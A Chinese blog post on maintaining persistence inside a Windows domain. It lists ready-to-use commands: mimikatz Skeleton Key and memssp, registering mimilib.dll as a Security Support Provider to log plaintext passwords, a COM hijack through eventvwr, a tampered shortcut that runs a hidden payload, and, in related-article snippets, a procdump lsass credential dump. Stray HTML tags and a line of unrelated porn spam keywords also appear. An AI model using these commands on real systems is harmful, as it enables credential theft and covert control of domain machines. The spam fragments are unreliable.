<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網滲透|域內持久權限維持總結

    VSole2021-08-08 07:20:00

    0x01 萬能密碼(Skeleton Key)

    將自身注入lsass進程創建一個主密碼,可以適用于域內的任意賬戶。

    前提條件是擁有域管權限。

    mimikatz執行:

    privilege::debug
    misc::skeleton
    

    然后ipc連接域控

    0x02 SSP

    SSPI 將負責為想要通信的兩臺機器找到合適的協議。對此的首選方法是 Kerberos。然后 SSPI 將協商將使用哪種身份驗證協議,這些身份驗證協議稱為安全支持提供程序 (SSP),以 DLL 的形式位于每臺 Windows 機器內部,并且兩臺機器必須支持相同才能進行通信。

    我們可以自己創建ssp,捕獲明文。

    2.1 注冊SSP DLL

    1.將mimilib.dll復制到system32目錄下

    move mimilib.dll %systemroot%\system32
    

    2.查看Security Packages

    reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
    

    3.修改Security Packages值

    reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
    

    密碼會保存在:

    C:\Windows\System32\kiwissp.log
    

    會產生事件ID為4657的日志。

    2.2 內存加載

    privilege::debug
    misc::memssp
    

    當用戶登錄的時候密碼會儲存在

    C:\Windows\system32\mimilsa.log
    

    0x03 com劫持

    Microsoft 組件對象模型 (COM) 是一個獨立于平臺、分布式、面向對象的系統,用于創建可以交互的二進制軟件組件。

    我們可以更改事件管理器,使其打開啟動我們的二進制文件。

    修改

    HKCU\SOFTWARE\Classes\mscfile\shell\open\command
    

    將原來的

    %SystemRoot%\system32\mmc.exe "%1" %*
    

    修改為:

    C:\windows\system32\cmd.exe
    

    執行:

    reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "c:\windows\system32\cmd.exe /c \"start cmd\"" /f
    eventvwr.exe
    

    0x04 lnk

    這里以該快捷文件為例:

    修改目標為:

    powershell.exe -c "invoke-item C:\Users\Administrator\Desktop\AdExplorer\ADExplorer64.exe; invoke-item c:\windows\system32\calc.exe"
    

    再把圖標修改回來:

    運行lnk

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    持久權限維持總結
    很多人把這個原因歸結于KB2871997補丁,實際上不然,這個事情的成因實際是UAC在搗亂。RID為500的賬戶和屬于本地administrators組的用戶在通過網絡遠程鏈接時,默認就是高權限令牌。
    信息搜集:開源情報信息收集、創建企業密碼字典進入:基于企業弱賬號漏洞、基于系統漏洞進入、網站應用程序滲透隱匿攻擊:Command and Control、代理跨邊界應用:跨邊界轉發、跨邊界代理穿透、shell反彈等
    如果找到了某個用戶的ntlm hash,就可以拿這個ntlm hash當作憑證進行遠程登陸了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos協議均存在PTH: NTLM自然不用多說 kerberos協議也是基于用戶的client hash開始一步步認證的,自然也會受PTH
    # 此時攻擊機已經獲取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷鍵。$ fg$ reset //這一步我實測有問題,輸了會出問題,不輸也沒有影響,所以如果輸了有問題可以不輸。低權限提權首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类